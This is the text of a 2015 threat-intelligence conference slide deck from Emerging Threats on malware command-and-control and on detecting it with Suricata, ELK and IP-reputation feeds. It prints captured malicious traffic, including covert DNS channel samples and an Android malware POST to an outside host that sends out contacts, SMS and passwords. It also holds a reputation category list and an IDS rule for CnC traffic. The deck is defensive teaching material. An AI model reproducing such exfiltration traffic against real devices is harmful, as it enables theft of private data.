Emerging threats jonkman_sans_cti_summit_2015

CONFIDENTIAL
Threat Intel: Winning the War
with Open Source Tools
Matt Jonkman
CTO, Emerging Threats
President, OISF

2
CONFIDENTIAL
● 13+ year old open IDS community
● ET-Open IDS rules for Snort and Suricata
● ETPro Commercial rules
● IP and DNS reputation feeds
● Query Portal

CONFIDENTIAL
Powering Network Defense Solutions Worldwide
• Installed in 10,000s of IDS/IPS sensors globally
• International staff of top threat researchers
• Trusted for timely, accurate, comprehensive threat intelligence
3
• HQ in Indianapolis, IN
• Originally founded as open
source community in 2003
• Industry-leading cyber threat
intelligence services
• ETPro™ Ruleset
• IQRisk™ Rep List
• IQRisk™ Query
• 500+ customers in over 40
countries worldwide

4
● The Problem: Malware, Kits, Zombies →
● How to APPLY data
● Suricata + Kibana + ETOpen + Rep Feeds
Agenda

Malware Motivation
• Cash
• Data
• Warfare

9
Effective
Profitable
Constantly Refined
Exploit Kits

1
‣ IRC
‣ HTTP
‣ Non-Standard Protocols
‣ Custom Binary Channels
‣ Encrypted Channels
Command and Control

1
‣ SSL
‣ Emulate Known Good
‣ Social Networks
‣ Covert DNS Channels
‣ IM Networks
‣ SMS
Command and Control

1
Hello
xxxxxxxxxxxxxxxx.Windows XP.GT.Intel Pentium III Xeon
processor.x86 Family 6 Model 7 Stepping xxx
Mhz.xxxxxxx.RAM: 71 % used.RAM Total: xxxx MBs.Page
File: xxxx MBs.Page File Disponible: xxxx MBs.Virt Mem
Total: xxxxxxx MBs.Virt Mem Disponible: xxxxx MBs.Sin
Asignar.192.168.xxxx xxx xx.<xxxxx>--

1
inicio#&'b##'#UserXXXX#&'b##'#192.168.XX.5#&'b##'#XX
#&'b##'#XX-FXXXXXXXX5D#&'b##'#Microsoft Windows
XP/Service Pack 3

1
GET /index.html&_=13297496 HTTP/1.1
User-Agent: C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.<redacted>.tk
In Plain Sight...

GET / HTTP/1.1
User-Agent:
1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E
24
Host: xx5c1b1ea.ws
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Sat, 07 Jan 2012 00:51:49 GMT
Content-Type: text/html
Content-Length: 189
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 28 Dec 2011 00:51:49 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
<html>
<head>
<body style='margin:0px;padding:0px'>
<iframe border='none' style='width:100%;height:100%;border:medium
none;' src='http://1.ws/wc/"xx5c1b01ea.ws"'></iframe>
</body>
</html>

1
No One Will See Me on Port 80....
I’m a Ninja!

1
I’ll Make Up a l33t Protocol....

<html><head><meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>C# Tutorial: GDI Drawing with Pen and Brush</title>
<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">
</head><body>
<p> <a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"
tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>   
<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"
tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>   
<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"
tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>
<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>
<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>
</h1>

<p>In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library.
GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to
.NET, C programmers were using GDI library to create breathtaking graphics.
GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for
moderately complicated static graphs. However, it tends to be slow for moving
images and not sophisticated enough for 3 dimensional graphics. On Windows NT
platforms, GDI+ as well as GDI do not perform very well. The problem lies in the
way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user
context and access graphics devices in system context. When GDI/GDI+ application
runs on Windows NT based machine, it has to constantly wait for these context
switches to occur. This makes GDI/GDI+ applications too slow for video game
programming and fancy 3 D graphics. Microsoft recently released a highly
optimized graphics platform - Managed DirectX which I will cover in a separate
tutorial.</p>
<script type="text/javascript"
src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<p>The

2
23546.1.d869c6f2f70dd3dcf64b047f9
9f46be8.chr.santa-inbox.com
0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-
0-o-s-1-b-e-6-u-v-3-f-r-k.0-0-0-0-0-
0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-
0-0-0-0-0.info
Covert DNS Channels

2
Request: TXT
2.32206.pf.deoderante.com
Response:
E9XnBP6CTP7zjAK43bg3RWWBwX5JpuFyTTpphcekpDR9nFP
T7kzB3WEf9xe7fUAeFH4h1xWODFappd3kVXwLLdzAzjDSU
s/ssIHbc8OFxhrw1D5Uh3UI1il+d5sa3oKB8qqo9oA8d5Jy4g7u
wiScX+cBVkkrMMSsrAYTAiOjQswiVgU5AxQMybshGD0H0j
RJVjBob6CLqMgcO0mpzxR1ccVbb8oG"
Covert DNS Channels

2
"606.32206.pf.deoderante.com"
"YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hp
"YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hp
"ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpA
"xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74
"6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGY
"wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U
"NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdT
"yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5Yb
"yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5Yb
"NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2

2
Android!
POST /upload.php HTTP/1.1
accept: application/json
Content-Length: 2958
Content-Type: application/x-www-form-urlencoded
Host: gi60s.com
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Expect: 100-Continue
code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N
>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM
>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk
>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2
>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%
>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W
>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx
>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P
>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3
>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D
>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22
>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad
>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2
>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%220815123456789%22%2C%22type%22%3A%223%22%2C%
2%3A%221337
>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22
>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2
>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012
>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u
>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF
>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%
>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%
>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy
>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur
>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%
>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5
>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy
>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d

POST /upload.php HTTP/1.1
accept: application/json
Content-Length: 2958
Content-Type: application/x-www-form-urlencoded
Host: gi60s.com
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Expect: 100-Continue
code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N
>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM
>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk
>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2
>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%
>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W
>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx
>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P
>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3
>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D
>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22
>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad
>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2
>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%22081512
>3456789%22%2C%22type%22%3A%223%22%2C%22date%22%3A%221337
>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22
>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2
>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012
>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u
>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF
>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%
>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%
>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy
>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur
>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%
>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5
>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy
>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d

code=bb51d&data=
{"contacts":[
{"name":"Qm9i","numbers":"MDgxLTUwMTItMzQ1Njc4OTswODEtNTAxLTIzNDU2Nzg5Ow=="},{"name":"RXZl","numbers":"MDY1LTAzMS0zMzc7
1LTAzMS0zMzc7"},
{"name":"VHJlbnQ=","numbers":"MDE5LTk5OTswMTktOTk5Ow=="}],
"sms":[
{"address":"MDgxNTEyMzQ1Njc4OQ==","type":"1","date":"1337803772831","body":"SGVsbG8gV29ybGQh"},
{"address":"MDEwMjM0NQ==","type":"1","date":"1337766125374","body":"WW91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHl
IgQkFOSyE="},
{"address":"MDY1MDMxMzM3","type":"1","date":"1337766074005","body":"SGkhIEhvdyBhcmUgeW91Pw=="},
{"address":"MDgxNTAxMjM0NTY3ODk=","type":"1","date":"1337765998741","body":"VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczo
B0UzNjcjNUIGdyZWV0eg=="},
{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765942437","body":"TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2N
Q="},
{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765923366","body":"SGkgQm9iLCBob3cgYXJlIHlvdT8="}],
"recent":[
{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},
{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],
"url":[
{"url":"aHR0cDovL3d3dy5iYmMuY28udWsv"},
{"url":"aHR0cDovL3d3dy53ZWF0aGVyLmNvbS8="},
{"url":"aHR0cDovL3d3dy5hbWF6b24uY29tLw=="},
{"url":"aHR0cDovL2VzcG4uY29tLw=="},
{"url":"aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8="},
{"url":"aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw="},
{"url":"aHR0cDovL3d3dy5lYmF5LmNvbS8="},
{"url":"aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw=="},
{"url":"aHR0cDovL3d3dy5mYWNlYm9vay5jb20v"},
{"url":"aHR0cDovL3d3dy5teXNwYWNlLmNvbS8="},
{"url":"aHR0cDovL3d3dy5tc24uY29tLw=="},
{"url":"aHR0cDovL3d3dy55YWhvby5jb20v"},
{"url":"aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRyb2lkY2xpZW50"}

code=bb51d&data=
{"contacts":[
{"name":"Bob","numbers":"081-5012-3456789;081-501-23456789;"},
{"name":"Eve","numbers":"065-031-337;065-031-337;"},
{"name":"Trent","numbers":"019-999;019-999;"}],
"sms":[
{"address":"0815123456789","type":"1","date":"1337803772831","body":"lo World!"},
{"address":"0102345","type":"1","date":"1337766125374","body":"Your smsTan: t4nS3cr3T Best Regards your
BANK!"},
{"address":"065031337","type":"1","date":"1337766074005","body":"Hi! How are you?"},
{"address":"08150123456789","type":"1","date":"1337765998741","body":"Thx for the password :) Mine is:
n0tS3cr3T greetz"},
{"address":"081-5012-3456789","type":"2","date":"1337765942437","body":"My secret password is: t0ps3cr3t"},
{"address":"081-5012-3456789","type":"2","date":"1337765923366","body":"Hi Bob, how are you?"}],
"recent":[
{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],
"url":[
{ "url":"http://www.bbc.co.uk/"},
{ "url":"http://www.weather.com/"},
{ "url":"http://www.amazon.com/"},
{ "url":"http://espn.com/"},
{ "url":"http://www.nytimes.com/"},
{ "url":"http://www.cnn.com/"},
{ "url":"http://www.ebay.com/"},
{ "url":"http://www.wikipedia.org/"},
{ "url":"http://www.facebook.com/"},
{ "url":"http://www.myspace.com/"},
{ "url":"http://www.msn.com/"},
{ "url":"http://www.yahoo.com/"},
{ "url":"http://picasaweb.google.com/m/viewer?source=androidclient"}

3
Use the Tools!
Defense in Layers
Defense

3
Suricata!!!
Intrusion Detection

Suricata – Cost-effective IDS
• Open-source IDPS
• Developed by the OISF
• First beta introduced in December 2009
• Supported OS
• FreeBSD
• Linux
• UNIX
• Mac OS
• Microsoft Windows
• Licensing and Availability
• GNU General Public License
• www.suricata-ids.org

3
Current Release 2.0.6
and 2.1 beta
Many Agencies
Many Products

4
Automated Protocol Detection

4
File Identification
File Extraction
File MD5sum
File_magic Identification

4
SSL Cert Extraction/Matching
SSL Analysis
SSL Logging

4
Lua Scripting
NSM Mode
Netflow Logging

4
Open Source in a Non-Profit!

{"timestamp":"2014-11-
18T12:40:42.744230","flow_id":2901423184,"event_ty
pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d
est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-
linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt
u.com","http_user_agent":"Debian APT-
HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt
u/pool/main/u/util-linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","magic":"Debian binary
package
(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff
02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id
":2}}

21T08:11:45.222089","flow_id":2896612328,"event_ty
pe":"tls","src_ip":"23.206.115.50","src_port":443,"dest_
ip":"10.8.0.6","dest_port":47063,"proto":"TCP",
"tls":{"subject":"serialNumber=5189573, unknown=US,
unknown=Delaware, unknown=Private Organization,
C=US, unknown=94107, ST=California, L=San
Francisco, unknown=855 FOLSOM ST APT 535,
O=Remember The Milk Inc., OU=Comodo EV SAN
SSL,CN=www.rememberthemilk.com","issuerdn":"C=
GB, ST=Greater Manchester, L=Salford, O=COMODO
CA Limited, CN=COMODO Extended Validation
Secure Server CA 2",
"fingerprint":"0b:1e:68:8c:ec:9f:7a:9c:70:4f:58:41:fb:c6:
53:ba:ba:e1:6c:af","version":"TLS 1.2"}}

21T08:32:22.001162","flow_id":2904615464,"event_type":"netflow","src_ip":"23.206.107.75","src_port":443,"dest_ip":"10.8.0.6","dest_port":52556,
"proto":"TCP",
"netflow":{"app_proto":"tls","pkts":73,"bytes":66135,"start":"2014-11-21T08:28:08.789426","end":"2014-11-
21T08:30:19.242083","age":131},"tcp":{"tcp_flags":"1b","syn":true,"fin":true,"psh":true,"ack":true}}

5
Elasticsearch
Logstash
Kibana
ELK

5
Elasticsearch
Logstash
Kibana

7
# IP Reputation
#reputation-categories-file:
/etc/suricata/iprep/categories.txt
#default-reputation-path: /etc/suricata/iprep
#reputation-files:
# - reputation.list

7
1,CnC,Malware Command and Control Server
2,Bot,Known Infected Bot
3,Spam,Known Spam Source
4,Drop,Drop site for logs or stolen credentials
5,SpywareCnC,Spyware Reporting Server
6,OnlineGaming,Questionable Gaming Site
7,DriveBySrc,Driveby Source
9,ChatServer,POLICY Chat Server
10,TorNode,POLICY Tor Node
13,Compromised,Known compromised or Hostile
15,P2P,P2P Node
16,Proxy,Proxy Host
17,IPCheck,IP Check Services
19,Utility,Known Good Public Utility
20,DDoSTarget,Target of a DDoS
21,Scanner,Host Performing Scanning
23,Brute_Forcer,SSH or other brute forcer
24,FakeAV,Fake AV and AS Products
25,DynDNS,Domain or IP Related to a Dynamic DNS
Entry or Request
26,Undesirable,Undesirable but not illegal
27,AbusedTLD,Abused or free TLD Related
28,SelfSignedSSL,Self Signed SSL or other
suspicious encryption
29,Blackhole,Blackhole or Sinkhole systems
30,RemoteAccessService,GoToMyPC and similar
remote access services
31,P2PCnC,Distributed CnC Nodes
33,Parking,Domain or SEO Parked
34,VPN,VPN Server
35,EXE_Source,Observed serving executables
37,Mobile_CnC,Known CnC for Mobile specific
Family
38,Mobile_Spyware_CnC,Spyware CnC specific
to mobile devices
39,Skype_SuperNode,Observed Skype Bootstrap
or Supernode
40,Bitcoin_Related,Bitcoin Mining and related
41,DDoSAttacker,DDoS Source

7
104.28.1.81,34,117
109.98.29.2,21,42
110.4.91.87,35,107
114.49.15.0,2,67
114.79.12.5,2,87
114.99.50.2,21,107
115.68.2.49,24,63
119.6.108.7,23,42
119.81.70.6,23,122
12.23.239.4,21,82
120.83.6.14,23,32
121.7.94.49,15,82
123.0.48.59,15,57
125.69.87.5,21,72
135.23.77.3,21,50
14.3.38.120,23,70
142.0.38.68,2,37

7
alert ip $HOME_NET any -> any any
(msg:"IPREP internal host talking to CnC
server"; flow:to_server; iprep:dst,CnC,>,30;
sid:1; rev:1;)

7
https://home.regit.org
Intel(R) Xeon(R) CPU E5-2680 0 @ 2.70GHz
(16 cores counting Hyperthreading)
32Gig Ram
Intel 82599EB 10-Gigabit SFI/SFP+ (approx $700)
~ $4,972

7
Runs 9.6gig/sec sustained
9,823 Rules (ET Pro)
<1% Packet Loss

7
What do you
want your IDS
to do?
(Awkward pause for ideas/questions)

Contact Information
• Matt Jonkman, CTO
mjonkman@emergingthreats.net
• Emerging Threats Sales
sales.americas@emergingthreats.net
http://www.emergingthreats.net
http://www.suricata-ids.org
http://openinfosecfoundation.org

Emerging threats jonkman_sans_cti_summit_2015

Recommended

Recommended

More Related Content

Similar to Emerging threats jonkman_sans_cti_summit_2015

Similar to Emerging threats jonkman_sans_cti_summit_2015 (20)

Recently uploaded

Recently uploaded (20)

Emerging threats jonkman_sans_cti_summit_2015